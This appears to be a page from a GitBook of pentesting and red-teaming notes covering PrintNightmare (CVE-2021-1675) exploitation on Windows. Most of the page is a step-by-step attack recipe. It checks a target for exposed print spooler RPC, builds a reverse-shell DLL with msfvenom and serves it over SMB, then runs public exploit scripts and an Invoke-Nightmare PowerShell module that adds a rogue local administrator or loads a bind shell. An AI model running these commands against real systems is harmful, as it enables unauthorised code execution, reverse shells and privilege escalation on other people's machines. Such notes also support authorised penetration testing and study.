🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  1. Windows
  2. Exploits

CVE-2021-1675 - PrintNightmare

PreviousCVE-2020-16938NextCVE-2022-21999 - SpoolFool

Last updated 2 years ago

To check if it's vulnerable,

Using impackets rpcdump.py,

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Remote exploitation,

Generate a dll,

msfvenom -p windows/shell/reverse_tcp LHOST=`x` LPORT=443 -f dll > shell.dll

Serve the dll with smbserver

impacket-smbserver -debug morph3 . -smb2support

Exploiting it,

./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'

Local exploitation,

Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"

or

Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default 

https://github.com/cube0x0/CVE-2021-1675
https://github.com/ly4k/PrintNightmare
https://github.com/calebstewart/CVE-2021-1675